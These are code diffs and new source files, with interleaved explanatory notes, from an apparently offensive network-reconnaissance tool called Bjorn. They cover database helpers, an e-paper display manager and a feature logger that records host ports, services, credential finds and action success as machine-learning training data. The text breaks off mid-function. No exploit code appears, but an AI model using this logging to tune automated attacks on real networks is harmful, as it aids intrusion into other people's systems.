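now = datetime(2026, 2, 18, 12, 0, 0)
conn.executemany(
    "INSERT INTO ml_export_batches VALUES (?, ?)",
    [
        ("old.jsonl", (now - timedelta(days=45)).isoformat()),
        ("fresh.jsonl", (now - timedelta(days=2)).isoformat()),
    ],
)
cutoff = (now - timedelta(days=30)).isoformat()
# Lexicographic '<' on uniform ISO-8601 strings equals chronological '<'
stale = conn.execute(
    "SELECT file_path FROM ml_export_batches WHERE created_at < ?", (cutoff,)
).fetchall()
```

Mixing formats (e.g. epoch seconds next to ISO strings) would silently break this query.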


@@ -156,6 +156,15 @@ class BjornDatabase:
return self._config.save_config(config)
# Host operations
def get_host_by_mac(self, mac_address: str) -> Optional[Dict[str, Any]]:
"""Get a single host by MAC address"""
try:
results = self.query("SELECT * FROM hosts WHERE mac_address=? LIMIT 1", (mac_address,))
return results[0] if results else None
except Exception as e:
logger.error(f"Error getting host by MAC {mac_address}: {e}")
return None
def get_all_hosts(self) -> List[Dict[str, Any]]:
return self._hosts.get_all_hosts()
@@ -519,6 +528,21 @@ class BjornDatabase:
def vacuum(self) -> None:
"""Vacuum the database"""
return self._base.vacuum()
def close(self) -> None:
"""Close database connection gracefully."""
try:
with self._lock:
if hasattr(self, "_base") and self._base:
# DatabaseBase handles the actual connection closure
if hasattr(self._base, "_conn") and self._base._conn:
self._base._conn.close()
logger.info("BjornDatabase connection closed")
except Exception as e:
logger.debug(f"Error during database closure (ignorable if already closed): {e}")
# Removed __del__ as it can cause circular reference leaks and is not guaranteed to run.
# Lifecycle should be managed by explicit close() calls.
# Internal helper methods used by modules
def _table_exists(self, name: str) -> bool:


@@ -162,7 +162,8 @@ class ActionOps:
b_rate_limit = COALESCE(excluded.b_rate_limit, actions.b_rate_limit),
b_stealth_level = COALESCE(excluded.b_stealth_level, actions.b_stealth_level),
b_risk_level = COALESCE(excluded.b_risk_level, actions.b_risk_level),
-b_enabled = COALESCE(excluded.b_enabled, actions.b_enabled),
+-- Keep persisted enable/disable state from DB across restarts.
+b_enabled = actions.b_enabled,
b_args = COALESCE(excluded.b_args, actions.b_args),
b_name = COALESCE(excluded.b_name, actions.b_name),
b_description = COALESCE(excluded.b_description, actions.b_description),
@@ -218,8 +219,10 @@ class ActionOps:
WHERE id = 1
""", (action_count_row['cnt'],))
# Invalidate cache so callers immediately see fresh definitions
type(self).get_action_definition.cache_clear()
logger.info(f"Synchronized {len(actions)} actions")
def list_actions(self):
"""List all action definitions ordered by class name"""
return self.base.query("SELECT * FROM actions ORDER BY b_class;")
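The `cache_clear()` call added above matters because `lru_cache` on a method lives on the class and is shared across instances, so stale definitions would otherwise survive a re-sync. A self-contained illustration of the pattern, with a plain dict standing in for the actions table:

```python
from functools import lru_cache

class Registry:
    data = {"scan": {"enabled": 1}}

    @lru_cache(maxsize=32)
    def get(self, name):
        # `self` is part of the cache key; the cache itself lives on the class
        return Registry.data.get(name)

r = Registry()
first = r.get("scan")
Registry.data["scan"] = {"enabled": 0}  # simulate sync updating the table
stale = r.get("scan")                    # cached: still the old row
type(r).get.cache_clear()                # what sync now does after writing
fresh = r.get("scan")
```

`type(self).get_action_definition.cache_clear()` in the hunk is the same move: reach the wrapped function through the class to invalidate every cached lookup at once.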
@@ -261,23 +264,6 @@ class ActionOps:
})
return out
-# def list_action_cards(self) -> list[dict]:
-#     """Lightweight descriptor of actions for card-based UIs"""
-#     rows = self.base.query("""
-#         SELECT b_class, b_enabled
-#         FROM actions
-#         ORDER BY b_class;
-#     """)
-#     out = []
-#     for r in rows:
-#         cls = r["b_class"]
-#         out.append({
-#             "name": cls,
-#             "image": f"/actions/actions_icons/{cls}.png",
-#             "enabled": int(r.get("b_enabled", 1) or 1),
-#         })
-#     return out
@lru_cache(maxsize=32)
def get_action_definition(self, b_class: str) -> Optional[Dict[str, Any]]:
"""Cached lookup of an action definition by class name"""


@@ -71,10 +71,8 @@ class StatsOps:
def get_stats(self) -> Dict[str, int]:
"""Compatibility alias to retrieve stats; ensures the singleton row exists"""
+self.ensure_stats_initialized()
row = self.base.query("SELECT total_open_ports, alive_hosts_count, all_known_hosts_count, vulnerabilities_count FROM stats WHERE id=1;")
-if not row:
-    self.ensure_stats_initialized()
-    row = self.base.query("SELECT total_open_ports, alive_hosts_count, all_known_hosts_count, vulnerabilities_count FROM stats WHERE id=1;")
r = row[0]
return {
"total_open_ports": int(r["total_open_ports"]),
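Calling `ensure_stats_initialized()` unconditionally before the read (as the hunk above does) replaces the old query-then-retry dance. The usual SQLite idiom behind such an `ensure` method is `INSERT OR IGNORE` on a fixed primary key — a sketch under that assumption, with a reduced `stats` schema:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("""
    CREATE TABLE stats (
        id INTEGER PRIMARY KEY CHECK (id = 1),
        total_open_ports INTEGER DEFAULT 0,
        alive_hosts_count INTEGER DEFAULT 0
    )
""")

def ensure_stats_initialized(c):
    # Idempotent: creates the singleton row only if it is missing.
    c.execute("INSERT OR IGNORE INTO stats (id) VALUES (1)")

ensure_stats_initialized(conn)
ensure_stats_initialized(conn)  # safe to call on every read
row = conn.execute("SELECT total_open_ports FROM stats WHERE id = 1").fetchone()
```

Since the ensure step is idempotent and cheap, doing it first makes the subsequent `row[0]` access safe without a second query path.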


@@ -22,6 +22,7 @@ class StudioOps:
self.base.execute("""
CREATE TABLE IF NOT EXISTS actions_studio (
b_class TEXT PRIMARY KEY,
b_priority INTEGER DEFAULT 50,
studio_x REAL,
studio_y REAL,
studio_locked INTEGER DEFAULT 0,
@@ -31,6 +32,9 @@ class StudioOps:
);
""")
# Migration: ensure b_priority exists on pre-existing databases
self.base._ensure_column("actions_studio", "b_priority", "b_priority INTEGER DEFAULT 50")
# Studio edges (relationships between actions)
self.base.execute("""
CREATE TABLE IF NOT EXISTS studio_edges (
@@ -255,6 +259,7 @@ class StudioOps:
self.base.execute("""
CREATE TABLE IF NOT EXISTS actions_studio (
b_class TEXT PRIMARY KEY,
b_priority INTEGER DEFAULT 50,
studio_x REAL,
studio_y REAL,
studio_locked INTEGER DEFAULT 0,
@@ -282,10 +287,12 @@ class StudioOps:
- Insert missing b_class entries
- Update NULL fields only (non-destructive)
"""
-# 1) Minimal table: PK + studio_* columns
+# 1) Minimal table: PK + studio_* columns (b_priority must be here so
+# get_studio_actions() can ORDER BY it before _sync adds action columns)
self.base.execute("""
CREATE TABLE IF NOT EXISTS actions_studio (
b_class TEXT PRIMARY KEY,
b_priority INTEGER DEFAULT 50,
studio_x REAL,
studio_y REAL,
studio_locked INTEGER DEFAULT 0,

display.py — 1273 changed lines; diff suppressed because it is too large.

epd_manager.py

@@ -1,436 +1,259 @@
"""
EPD Manager - singleton wrapper around Waveshare drivers.
Hardened for runtime stability:
- no per-operation worker-thread timeouts (prevents leaked stuck SPI threads)
- serialized SPI access
- bounded retry + recovery
- health metrics for monitoring
"""
import importlib
import threading
import time

from PIL import Image

from logger import Logger

logger = Logger(name="epd_manager.py")

DEBUG_MANAGER = False


def debug_log(message, level="debug"):
    if not DEBUG_MANAGER:
        return
    if level == "info":
        logger.info(f"[EPD_MANAGER] {message}")
    elif level == "warning":
        logger.warning(f"[EPD_MANAGER] {message}")
    elif level == "error":
        logger.error(f"[EPD_MANAGER] {message}")
    else:
        logger.debug(f"[EPD_MANAGER] {message}")


class EPDManager:
    _instance = None
    _instance_lock = threading.Lock()
    _spi_lock = threading.RLock()

    MAX_CONSECUTIVE_ERRORS = 3
    RESET_COOLDOWN = 5.0

    def __new__(cls, epd_type: str):
        with cls._instance_lock:
            if cls._instance is None:
                cls._instance = super().__new__(cls)
                cls._instance._initialized = False
        return cls._instance

    def __init__(self, epd_type: str):
        if self._initialized:
            if epd_type != self.epd_type:
                logger.warning(
                    f"EPDManager already initialized with {self.epd_type}, "
                    f"ignoring requested type {epd_type}"
                )
            return
        self.epd_type = epd_type
        self.epd = None
        self.last_reset = time.time()
        self.error_count = 0
        self.last_error_time = 0.0
        self.total_operations = 0
        self.successful_operations = 0
        self.last_operation_duration = 0.0
        self.total_operation_duration = 0.0
        self.timeout_count = 0
        self.recovery_attempts = 0
        self.recovery_failures = 0
        self._load_driver()
        self._initialized = True

    # ------------------------------------------------------------------ driver
    def _load_driver(self):
        debug_log(f"Loading EPD driver {self.epd_type}", "info")
        epd_module_name = f"resources.waveshare_epd.{self.epd_type}"
        epd_module = importlib.import_module(epd_module_name)
        self.epd = epd_module.EPD()

    # ------------------------------------------------------------------ calls
    def _safe_call(self, func, *args, **kwargs):
        with EPDManager._spi_lock:
            self.total_operations += 1
            started = time.monotonic()
            try:
                result = func(*args, **kwargs)
            except Exception as exc:
                self.error_count += 1
                self.last_error_time = time.time()
                logger.error(f"EPD operation failed ({func.__name__}): {exc}")
                if self.error_count < self.MAX_CONSECUTIVE_ERRORS:
                    return self._simple_retry(func, args, kwargs, exc)
                return self._perform_recovery(func, args, kwargs, exc)
            self.successful_operations += 1
            self.error_count = 0
            self.last_operation_duration = time.monotonic() - started
            self.total_operation_duration += self.last_operation_duration
            return result

    def _simple_retry(self, func, args, kwargs, original_error):
        time.sleep(0.3)
        try:
            result = func(*args, **kwargs)
            self.successful_operations += 1
            self.error_count = 0
            return result
        except Exception as retry_error:
            logger.error(f"EPD retry failed ({func.__name__}): {retry_error}")
            raise original_error

    def _perform_recovery(self, func, args, kwargs, original_error):
        now = time.time()
        wait_s = max(0.0, self.RESET_COOLDOWN - (now - self.last_reset))
        if wait_s > 0:
            time.sleep(wait_s)
        self.recovery_attempts += 1
        try:
            self.hard_reset()
            result = func(*args, **kwargs)
            self.successful_operations += 1
            self.error_count = 0
            return result
        except Exception as exc:
            self.recovery_failures += 1
            logger.critical(f"EPD recovery failed: {exc}")
            self.error_count = 0
            raise original_error

    # -------------------------------------------------------------- public api
    def init_full_update(self):
        return self._safe_call(self._init_full)

    def init_partial_update(self):
        return self._safe_call(self._init_partial)

    def display_partial(self, image):
        return self._safe_call(self._display_partial, image)

    def display_full(self, image):
        return self._safe_call(self._display_full, image)

    def clear(self):
        return self._safe_call(self._clear)

    def sleep(self):
        return self._safe_call(self._sleep)

    def check_health(self):
        uptime = time.time() - self.last_reset
        success_rate = 100.0
        avg_ms = 0.0
        if self.total_operations > 0:
            success_rate = (self.successful_operations / self.total_operations) * 100.0
            avg_ms = (self.total_operation_duration / self.total_operations) * 1000.0
        return {
            "uptime_seconds": round(uptime, 3),
            "total_operations": int(self.total_operations),
            "successful_operations": int(self.successful_operations),
            "success_rate": round(success_rate, 2),
            "consecutive_errors": int(self.error_count),
            "timeout_count": int(self.timeout_count),
            "last_reset": self.last_reset,
            "last_operation_duration_ms": round(self.last_operation_duration * 1000.0, 2),
            "avg_operation_duration_ms": round(avg_ms, 2),
            "recovery_attempts": int(self.recovery_attempts),
            "recovery_failures": int(self.recovery_failures),
            "is_healthy": self.error_count == 0,
        }

    # ------------------------------------------------------------- impl methods
    def _init_full(self):
        if hasattr(self.epd, "FULL_UPDATE"):
            self.epd.init(self.epd.FULL_UPDATE)
        elif hasattr(self.epd, "lut_full_update"):
            self.epd.init(self.epd.lut_full_update)
        else:
            self.epd.init()

    def _init_partial(self):
        if hasattr(self.epd, "PART_UPDATE"):
            self.epd.init(self.epd.PART_UPDATE)
        elif hasattr(self.epd, "lut_partial_update"):
            self.epd.init(self.epd.lut_partial_update)
        else:
            self.epd.init()

    def _display_partial(self, image):
        if hasattr(self.epd, "displayPartial"):
            self.epd.displayPartial(self.epd.getbuffer(image))
        else:
            self.epd.display(self.epd.getbuffer(image))

    def _display_full(self, image):
        self.epd.display(self.epd.getbuffer(image))

    def _clear(self):
        if hasattr(self.epd, "Clear"):
            self.epd.Clear()
            return
        w, h = self.epd.width, self.epd.height
        blank = Image.new("1", (w, h), 255)
        try:
            self._display_partial(blank)
        finally:
            blank.close()

    def _sleep(self):
        if hasattr(self.epd, "sleep"):
            self.epd.sleep()

    def hard_reset(self, force: bool = False):
        with EPDManager._spi_lock:
            started = time.monotonic()
            try:
                if self.epd and hasattr(self.epd, "epdconfig"):
                    try:
                        self.epd.epdconfig.module_exit(cleanup=True)
                    except TypeError:
                        self.epd.epdconfig.module_exit()
                    except Exception as exc:
                        logger.warning(f"EPD module_exit during reset failed: {exc}")
                self._load_driver()
                # Validate the new driver with a full init.
                if hasattr(self.epd, "FULL_UPDATE"):
                    self.epd.init(self.epd.FULL_UPDATE)
                else:
                    self.epd.init()
                self.last_reset = time.time()
                self.error_count = 0
                if force:
                    logger.warning(
                        f"EPD forced hard reset completed in {time.monotonic() - started:.2f}s"
                    )
                else:
                    logger.warning(
                        f"EPD hard reset completed in {time.monotonic() - started:.2f}s"
                    )
            except Exception as exc:
                logger.critical(f"EPD hard reset failed: {exc}")
                raise

### END OF FILE ###
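The core of the rewrite is that every public call funnels through one serialized `_safe_call` with a bounded retry, rather than spawning a timeout thread per operation. A compressed, self-contained sketch of that retry accounting (not the real class — the driver is replaced by a flaky stub):

```python
import threading

class SafeCaller:
    """Simplified version of EPDManager._safe_call: serialize, retry once on failure."""
    def __init__(self):
        self._lock = threading.RLock()  # re-entrant, like EPDManager._spi_lock
        self.error_count = 0
        self.total = 0
        self.ok = 0

    def call(self, func):
        with self._lock:
            self.total += 1
            try:
                result = func()
            except Exception:
                self.error_count += 1
                result = func()  # single bounded retry (recovery path omitted)
            self.ok += 1
            self.error_count = 0  # any success clears the consecutive-error count
            return result

flaky_state = {"fails_left": 1}

def flaky():
    if flaky_state["fails_left"] > 0:
        flaky_state["fails_left"] -= 1
        raise RuntimeError("transient SPI glitch")
    return "drawn"

caller = SafeCaller()
outcome = caller.call(flaky)
```

Because callers never add their own locking, a transient failure costs one retry inside the lock instead of a leaked worker thread blocked on SPI.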

feature_logger.py — new file, 762 lines.

@@ -0,0 +1,762 @@
"""
feature_logger.py - Dynamic Feature Logging Engine for Bjorn
═══════════════════════════════════════════════════════════════════════════
Purpose:
Automatically capture ALL relevant features from action executions
for deep learning model training. No manual feature declaration needed.
Architecture:
- Automatic feature extraction from all data sources
- Time-series aggregation
- Network topology features
- Action success patterns
- Lightweight storage optimized for Pi Zero
- Export format ready for deep learning
Author: Bjorn Team (Enhanced AI Version)
Version: 2.0.0
"""
import json
import time
import hashlib
import random
from datetime import datetime, timedelta
from typing import Dict, List, Any, Optional, Tuple
from collections import defaultdict, deque
from logger import Logger
logger = Logger(name="feature_logger.py", level=20)
class FeatureLogger:
"""
Captures comprehensive features from network reconnaissance
and action execution for deep learning.
"""
def __init__(self, shared_data):
"""Initialize feature logger with database connection"""
self.shared_data = shared_data
self.db = shared_data.db
self._max_hosts_tracked = max(
64, int(getattr(self.shared_data, "ai_feature_hosts_limit", 512))
)
# Rolling windows for temporal features (memory efficient)
self.recent_actions = deque(maxlen=100)
self.host_history = defaultdict(lambda: deque(maxlen=50))
# Initialize feature tables
self._ensure_tables_exist()
logger.info("FeatureLogger initialized - auto-discovery mode enabled")
# ═══════════════════════════════════════════════════════════════════════
# DATABASE SCHEMA
# ═══════════════════════════════════════════════════════════════════════
def _ensure_tables_exist(self):
"""Create feature logging tables if they don't exist"""
try:
# Main feature log table
self.db.execute("""
CREATE TABLE IF NOT EXISTS ml_features (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT NOT NULL DEFAULT CURRENT_TIMESTAMP,
-- Identifiers
mac_address TEXT,
ip_address TEXT,
action_name TEXT,
-- Context features (JSON)
host_features TEXT, -- Vendor, ports, services, etc.
network_features TEXT, -- Topology, neighbors, subnets
temporal_features TEXT, -- Time patterns, sequences
action_features TEXT, -- Action-specific metadata
-- Outcome
success INTEGER,
duration_seconds REAL,
reward REAL,
-- Raw event data (for replay)
raw_event TEXT,
-- Consolidation status
consolidated INTEGER DEFAULT 0,
export_batch_id INTEGER
)
""")
# Index for fast queries
self.db.execute("""
CREATE INDEX IF NOT EXISTS idx_ml_features_mac
ON ml_features(mac_address, timestamp DESC)
""")
self.db.execute("""
CREATE INDEX IF NOT EXISTS idx_ml_features_consolidated
ON ml_features(consolidated, timestamp)
""")
# Aggregated features table (pre-computed for efficiency)
self.db.execute("""
CREATE TABLE IF NOT EXISTS ml_features_aggregated (
id INTEGER PRIMARY KEY AUTOINCREMENT,
computed_at TEXT NOT NULL DEFAULT CURRENT_TIMESTAMP,
mac_address TEXT,
time_window TEXT, -- 'hourly', 'daily', 'weekly'
-- Aggregated metrics
total_actions INTEGER,
success_rate REAL,
avg_duration REAL,
total_reward REAL,
-- Action distribution
action_counts TEXT, -- JSON: {action_name: count}
-- Discovery metrics
new_ports_found INTEGER,
new_services_found INTEGER,
credentials_found INTEGER,
-- Feature vector (for DL)
feature_vector TEXT, -- JSON array of numerical features
UNIQUE(mac_address, time_window, computed_at)
)
""")
# Export batches tracking
self.db.execute("""
CREATE TABLE IF NOT EXISTS ml_export_batches (
id INTEGER PRIMARY KEY AUTOINCREMENT,
created_at TEXT NOT NULL DEFAULT CURRENT_TIMESTAMP,
record_count INTEGER,
file_path TEXT,
status TEXT DEFAULT 'pending', -- pending, exported, transferred
notes TEXT
)
""")
logger.info("ML feature tables initialized")
except Exception as e:
logger.error(f"Failed to create ML tables: {e}")
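Because each feature group in `ml_features` is stored as a JSON blob, training-side code has to flatten the four columns back into one numeric vector. A sketch of that decode step — the column names match the schema above, but the flattening policy (sorted keys, outcome fields appended last) is an assumption, not this file's code:

```python
import json

row = {  # shape of one ml_features row after a SELECT
    "host_features": json.dumps({"open_ports": 3, "has_ssh": 1}),
    "network_features": json.dumps({"subnet_neighbors": 12}),
    "temporal_features": json.dumps({"hour_of_day": 14}),
    "action_features": json.dumps({"retry_count": 0}),
    "success": 1,
    "duration_seconds": 2.5,
    "reward": 10.0,
}

def to_vector(r):
    feats = {}
    for col in ("host_features", "network_features", "temporal_features", "action_features"):
        feats.update(json.loads(r[col]) or {})
    # Deterministic key ordering so every row maps to the same vector layout
    vec = [float(feats[k]) for k in sorted(feats)]
    vec += [float(r["success"]), float(r["duration_seconds"]), float(r["reward"])]
    return vec

vector = to_vector(row)
```

Keeping the schema as JSON blobs lets new features appear without migrations; the fixed ordering step is what makes the result usable as a dense model input.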
# ═══════════════════════════════════════════════════════════════════════
# AUTOMATIC FEATURE EXTRACTION
# ═══════════════════════════════════════════════════════════════════════
def log_action_execution(
self,
mac_address: str,
ip_address: str,
action_name: str,
success: bool,
duration: float,
reward: float,
raw_event: Dict[str, Any]
):
"""
Log a complete action execution with automatically extracted features.
Args:
mac_address: Target MAC address
ip_address: Target IP address
action_name: Name of executed action
success: Whether action succeeded
duration: Execution time in seconds
reward: Calculated reward value
raw_event: Complete event data (for replay/debugging)
"""
try:
# Shield against missing MAC
if not mac_address:
logger.debug("Skipping ML log: missing MAC address")
return
# Extract features from multiple sources
host_features = self._extract_host_features(mac_address, ip_address)
network_features = self._extract_network_features(mac_address)
temporal_features = self._extract_temporal_features(mac_address, action_name)
action_features = self._extract_action_features(action_name, raw_event)
# Store in database
self.db.execute("""
INSERT INTO ml_features (
mac_address, ip_address, action_name,
host_features, network_features, temporal_features, action_features,
success, duration_seconds, reward, raw_event
)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
""", (
mac_address, ip_address, action_name,
json.dumps(host_features),
json.dumps(network_features),
json.dumps(temporal_features),
json.dumps(action_features),
1 if success else 0,
duration,
reward,
json.dumps(raw_event)
))
# Update rolling windows
self.recent_actions.append({
'mac': mac_address,
'action': action_name,
'success': success,
'timestamp': time.time()
})
self.host_history[mac_address].append({
'action': action_name,
'success': success,
'timestamp': time.time()
})
self._prune_host_history()
logger.debug(
f"Logged features for {action_name} on {mac_address} "
f"(success={success}, features={len(host_features)}+{len(network_features)}+"
f"{len(temporal_features)}+{len(action_features)})"
)
# Prune old database records to save disk space (keep last 1000)
if random.random() < 0.05:  # ~5% chance per call, so pruning cost is amortized
self._prune_database_records()
except Exception as e:
logger.error(f"Failed to log action execution: {e}")
def _prune_host_history(self):
"""Bound host_history keys to avoid unbounded growth over very long runtimes."""
try:
current_size = len(self.host_history)
if current_size <= self._max_hosts_tracked:
return
overflow = current_size - self._max_hosts_tracked
ranked = []
for mac, entries in self.host_history.items():
if entries:
ranked.append((entries[-1]['timestamp'], mac))
else:
ranked.append((0.0, mac))
ranked.sort(key=lambda x: x[0]) # oldest first
for _, mac in ranked[:overflow]:
self.host_history.pop(mac, None)
except Exception:
pass
def _prune_database_records(self, limit: int = 1000):
"""Keep the ml_features table within a reasonable size limit."""
try:
self.db.execute("""
DELETE FROM ml_features
WHERE id NOT IN (
SELECT id FROM ml_features
ORDER BY timestamp DESC
LIMIT ?
)
""", (int(limit),))
except Exception as e:
logger.debug(f"Failed to prune ml_features: {e}")
def _extract_host_features(self, mac: str, ip: str) -> Dict[str, Any]:
"""
Extract features about the target host.
Auto-discovers all relevant attributes from database.
"""
features = {}
try:
# Get host data
host = self.db.get_host_by_mac(mac)
if not host:
return features
# Basic identifiers (hashed for privacy if needed)
features['mac_hash'] = hashlib.md5(mac.encode()).hexdigest()[:8]
features['vendor_oui'] = mac[:8].upper() if mac else None
# Vendor classification
vendor = host.get('vendor', '')
features['vendor'] = vendor
features['vendor_category'] = self._categorize_vendor(vendor)
# Network interfaces
ips = [p.strip() for p in (host.get('ips', '') or '').split(';') if p.strip()]
features['ip_count'] = len(ips)
features['has_multiple_ips'] = len(ips) > 1
# Subnet classification
if ips:
features['subnet'] = '.'.join(ips[0].split('.')[:3]) + '.0/24'
features['is_private'] = self._is_private_ip(ips[0])
# Open ports
ports_str = host.get('ports', '') or ''
ports = [int(p) for p in ports_str.split(';') if p.strip().isdigit()]
features['port_count'] = len(ports)
features['ports'] = sorted(ports)[:20] # Limit to top 20
# Port profiles (auto-detect common patterns)
features['port_profile'] = self._detect_port_profile(ports)
features['has_ssh'] = 22 in ports
features['has_http'] = 80 in ports or 8080 in ports
features['has_https'] = 443 in ports
features['has_smb'] = 445 in ports
features['has_rdp'] = 3389 in ports
features['has_database'] = any(p in ports for p in [3306, 5432, 1433, 27017])
# Services detected
services = self._get_services_for_host(mac)
features['service_count'] = len(services)
features['services'] = services
# Hostnames
hostnames = [h.strip() for h in (host.get('hostnames', '') or '').split(';') if h.strip()]
features['hostname_count'] = len(hostnames)
if hostnames:
features['primary_hostname'] = hostnames[0]
features['hostname_hints'] = self._extract_hostname_hints(hostnames[0])
# First/last seen
features['first_seen'] = host.get('first_seen')
features['last_seen'] = host.get('last_seen')
# Calculate age
if host.get('first_seen'):
ts = host['first_seen']
if isinstance(ts, str):
try:
first_seen_dt = datetime.fromisoformat(ts)
except ValueError:
# Fallback for other formats if needed
first_seen_dt = datetime.now()
elif isinstance(ts, datetime):
first_seen_dt = ts
else:
first_seen_dt = datetime.now()
age_hours = (datetime.now() - first_seen_dt).total_seconds() / 3600
features['age_hours'] = round(age_hours, 2)
features['is_new'] = age_hours < 24
# Credentials found
creds = self._get_credentials_for_host(mac)
features['credential_count'] = len(creds)
features['has_credentials'] = len(creds) > 0
# OS fingerprinting hints
features['os_hints'] = self._guess_os(vendor, ports, hostnames)
except Exception as e:
logger.error(f"Error extracting host features: {e}")
return features
def _extract_network_features(self, mac: str) -> Dict[str, Any]:
"""
Extract network topology and relationship features.
Discovers patterns in the network structure.
"""
features = {}
try:
# Get all hosts
all_hosts = self.db.get_all_hosts()
# Network size
features['total_hosts'] = len(all_hosts)
# Subnet distribution
subnet_counts = defaultdict(int)
for h in all_hosts:
ips = [p.strip() for p in (h.get('ips', '') or '').split(';') if p.strip()]
if ips:
subnet = '.'.join(ips[0].split('.')[:3]) + '.0'
subnet_counts[subnet] += 1
features['subnet_count'] = len(subnet_counts)
features['largest_subnet_size'] = max(subnet_counts.values()) if subnet_counts else 0
# Similar hosts (same vendor)
target_host = self.db.get_host_by_mac(mac)
if target_host:
vendor = target_host.get('vendor', '')
similar = sum(1 for h in all_hosts if h.get('vendor') == vendor)
features['similar_vendor_count'] = similar
# Port correlation (hosts with similar port profiles)
target_ports = set()
if target_host:
ports_str = target_host.get('ports', '') or ''
target_ports = {int(p) for p in ports_str.split(';') if p.strip().isdigit()}
if target_ports:
similar_port_hosts = 0
for h in all_hosts:
if h.get('mac_address') == mac:
continue
ports_str = h.get('ports', '') or ''
other_ports = {int(p) for p in ports_str.split(';') if p.strip().isdigit()}
# Calculate Jaccard similarity
if other_ports:
intersection = len(target_ports & other_ports)
union = len(target_ports | other_ports)
similarity = intersection / union if union > 0 else 0
if similarity > 0.5: # >50% similar
similar_port_hosts += 1
features['similar_port_profile_count'] = similar_port_hosts
# Network activity level
recent_hosts = sum(1 for h in all_hosts
if self._is_recently_active(h.get('last_seen')))
features['active_host_ratio'] = round(recent_hosts / len(all_hosts), 2) if all_hosts else 0
except Exception as e:
logger.error(f"Error extracting network features: {e}")
return features
def _extract_temporal_features(self, mac: str, action: str) -> Dict[str, Any]:
"""
Extract time-based and sequence features.
Discovers temporal patterns in attack sequences.
"""
features = {}
try:
# Current time features
now = datetime.now()
features['hour_of_day'] = now.hour
features['day_of_week'] = now.weekday()
features['is_weekend'] = now.weekday() >= 5
features['is_night'] = now.hour < 6 or now.hour >= 22
# Action history for this host
history = list(self.host_history.get(mac, []))
features['previous_action_count'] = len(history)
if history:
# Last action
last = history[-1]
features['last_action'] = last['action']
features['last_action_success'] = last['success']
features['seconds_since_last'] = round(time.time() - last['timestamp'], 1)
# Success rate history
successes = sum(1 for h in history if h['success'])
features['historical_success_rate'] = round(successes / len(history), 2)
# Action sequence
recent_sequence = [h['action'] for h in history[-5:]]
features['recent_action_sequence'] = recent_sequence
# Repeated action detection
same_action_count = sum(1 for h in history if h['action'] == action)
features['same_action_attempts'] = same_action_count
features['is_retry'] = same_action_count > 0
# Global action patterns
recent = list(self.recent_actions)
if recent:
# Action distribution in recent history
action_counts = defaultdict(int)
for a in recent:
action_counts[a['action']] += 1
features['most_common_recent_action'] = max(
action_counts.items(),
key=lambda x: x[1]
)[0] if action_counts else None
# Global success rate
global_successes = sum(1 for a in recent if a['success'])
features['global_success_rate'] = round(
global_successes / len(recent), 2
)
# Time since first seen
host = self.db.get_host_by_mac(mac)
if host and host.get('first_seen'):
ts = host['first_seen']
if isinstance(ts, str):
try:
first_seen = datetime.fromisoformat(ts)
except ValueError:
first_seen = now
elif isinstance(ts, datetime):
first_seen = ts
else:
first_seen = now
features['hours_since_discovery'] = round(
(now - first_seen).total_seconds() / 3600, 1
)
except Exception as e:
logger.error(f"Error extracting temporal features: {e}")
return features
def _extract_action_features(self, action_name: str, raw_event: Dict) -> Dict[str, Any]:
"""
Extract action-specific features.
Auto-discovers relevant metadata from action execution.
"""
features = {}
try:
features['action_name'] = action_name
# Action type classification
features['action_type'] = self._classify_action_type(action_name)
# Port-specific actions
port = raw_event.get('port')
if port:
features['target_port'] = int(port)
features['is_standard_port'] = int(port) < 1024
# Extract any additional metadata from raw event
# This allows actions to add custom features
if 'metadata' in raw_event:
metadata = raw_event['metadata']
if isinstance(metadata, dict):
# Flatten metadata into features
for key, value in metadata.items():
if isinstance(value, (int, float, bool, str)):
features[f'meta_{key}'] = value
# Execution context
features['operation_mode'] = self.shared_data.operation_mode
except Exception as e:
logger.error(f"Error extracting action features: {e}")
return features
# ═══════════════════════════════════════════════════════════════════════
# HELPER METHODS
# ═══════════════════════════════════════════════════════════════════════
def _categorize_vendor(self, vendor: str) -> str:
"""Categorize vendor into high-level groups"""
if not vendor:
return 'unknown'
vendor_lower = vendor.lower()
categories = {
'networking': ['cisco', 'juniper', 'ubiquiti', 'mikrotik', 'tp-link', 'netgear', 'asus', 'd-link', 'linksys'],
'iot': ['hikvision', 'dahua', 'axis', 'hanwha', 'tuya', 'sonoff', 'shelly', 'xiaomi', 'yeelight'],
'nas': ['synology', 'qnap', 'netapp', 'truenas', 'unraid'],
'compute': ['raspberry', 'intel', 'apple', 'dell', 'hp', 'lenovo', 'acer'],
'virtualization': ['vmware', 'microsoft', 'citrix', 'proxmox'],
'mobile': ['apple', 'samsung', 'huawei', 'xiaomi', 'google', 'oneplus']
}
for category, vendors in categories.items():
if any(v in vendor_lower for v in vendors):
return category
return 'other'
def _is_private_ip(self, ip: str) -> bool:
"""Check if IP is in private range"""
if not ip:
return False
parts = ip.split('.')
if len(parts) != 4:
return False
try:
first = int(parts[0])
second = int(parts[1])
return (
first == 10 or
(first == 172 and 16 <= second <= 31) or
(first == 192 and second == 168)
)
except (ValueError, TypeError):
return False
def _detect_port_profile(self, ports: List[int]) -> str:
"""Auto-detect device type from port signature"""
if not ports:
return 'unknown'
port_set = set(ports)
profiles = {
'camera': {554, 80, 8000, 37777},
'web_server': {80, 443, 8080, 8443},
'nas': {5000, 5001, 548, 139, 445},
'database': {3306, 5432, 1433, 27017, 6379},
'linux_server': {22, 80, 443},
'windows_server': {135, 139, 445, 3389},
'printer': {9100, 515, 631},
'router': {22, 23, 80, 443, 161}
}
max_overlap = 0
best_profile = 'generic'
for profile_name, profile_ports in profiles.items():
overlap = len(port_set & profile_ports)
if overlap > max_overlap:
max_overlap = overlap
best_profile = profile_name
return best_profile if max_overlap >= 2 else 'generic'
def _get_services_for_host(self, mac: str) -> List[str]:
"""Get list of detected services for host"""
try:
results = self.db.query("""
SELECT DISTINCT service
FROM port_services
WHERE mac_address=?
""", (mac,))
return [r['service'] for r in results if r.get('service')]
except Exception:
return []
def _extract_hostname_hints(self, hostname: str) -> List[str]:
"""Extract hints from hostname"""
if not hostname:
return []
hints = []
hostname_lower = hostname.lower()
keywords = {
'nas': ['nas', 'storage', 'diskstation'],
'camera': ['cam', 'ipc', 'nvr', 'dvr'],
'router': ['router', 'gateway', 'gw'],
'server': ['server', 'srv', 'host'],
'printer': ['printer', 'print'],
'iot': ['iot', 'sensor', 'smart']
}
for hint, words in keywords.items():
